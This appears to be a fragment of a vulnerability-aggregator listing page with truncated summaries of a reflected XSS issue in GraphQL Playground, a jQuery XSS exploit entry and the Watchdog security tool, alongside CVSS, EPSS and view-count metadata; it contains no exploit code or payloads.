This repository is GraphQL Playground, a GraphQL IDE for better development workflows, featuring context-aware autocompletion and error highlighting, interactive multi-column docs, and support for real-time GraphQL subscriptions. The tool is vulnerable to a reflected XSS attac...

AI score 6.4 | Exploits 0
Gitee | added 2025/09/06 2:16 a.m. | 444 views

Exploit for Cross-site Scripting in Jquery

Watchdog Tool Description: Watchdog is an integration of open-source security tools aimed at providing a holistic security view for a given domain/IP. The way Watchdog is built, it can be used by product security teams, red teams and also by bug bounty hunters to get a 360°...

CVSS 9.8 | AI score 7 | EPSS 0.75444 | Exploits 12

Total number of security vulnerabilities: 1899